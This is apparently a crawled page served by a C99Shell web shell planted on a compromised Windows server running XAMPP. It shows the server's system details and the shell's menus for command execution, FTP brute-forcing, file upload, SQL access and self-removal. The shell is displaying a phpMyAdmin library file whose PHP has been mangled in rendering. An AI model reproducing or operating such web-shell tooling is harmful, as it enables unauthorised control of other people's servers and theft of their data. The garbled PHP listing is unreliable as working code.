!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpmyadmin\libraries\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     select_server.lib.php (2.65 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Code for displaying server selection written by nijel
 * $Id: select_server.lib.php,v 2.5.2.1 2005/11/21 12:03:45 nijel Exp $
 */

if (count($cfg['Servers']) > 1) {
    if (
$show_server_left) {
        echo 
'<div class="heada">' $strServer ':</div>';
    } else {
        
?> 
<fieldset>
<legend><?php echo $strServerChoice?></legend>
        <?php
    
}
    if (!
$cfg['DisplayServersList']) {
        
?> 
    <form method="post" action="index.php" target="_parent">
        <select name="server" onchange="this.form.submit();">
        <?php
    
}
    foreach (
$cfg['Servers'] AS $key => $val) {
        if (!empty(
$val['host'])) {
             
$selected 0;
            if (!empty(
$server) && ($server == $key)) {
                
$selected 1;
            }
            if (!empty(
$val['verbose'])) {
                
$label $val['verbose'];
            } else {
                
$label $val['host'];
                if (!empty(
$val['port'])) {
                    
$label .= ':' $val['port'];
                }
            }
            
// loic1: if 'only_db' is an array and there is more than one
            //        value, displaying such informations may not be a so good
            //        idea
            
if (!empty($val['only_db'])) {
                
$label .= ' - ' . (is_array($val['only_db']) ? implode(', '$val['only_db']) : $val['only_db']);
            }
            if (!empty(
$val['user']) && ($val['auth_type'] == 'config')) {
                
$label .= '  (' $val['user'] . ')';
            }

            if (
$cfg['DisplayServersList']){
                if (
$selected && !$show_server_left) {
                    echo 
'&raquo; <b>' htmlspecialchars($label) . '</b><br />';
                }else{
                    echo 
'&raquo; <a class="item" href="index.php?server=' $key '&amp;lang=' $lang '&amp;convcharset=' $convcharset '" target="_top">' htmlspecialchars($label) . '</a><br />';
                }
            } else {
                echo 
'            <option value="' $key '" ' . ($selected ' selected="selected"' '') . '>' htmlspecialchars($label) . '</option>' "\n";
            }

        } 
// end if (!empty($val['host']))
    
// end while

    
if ( ! $cfg['DisplayServersList'] ) {
        
?> 
        </select>
        <input type="hidden" name="lang" value="<?php echo $lang?>" />
        <input type="hidden" name="convcharset" value="<?php echo $convcharset?>" />
        <noscript>
        <input type="submit" value="<?php echo $strGo?>" />
        </noscript>
    </form>
        <?php
    
}
    if (!
$show_server_left) {
        
?> 
</fieldset>
        <?php
    
} else {
        echo 
'<hr />';
    }
}
?> 

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--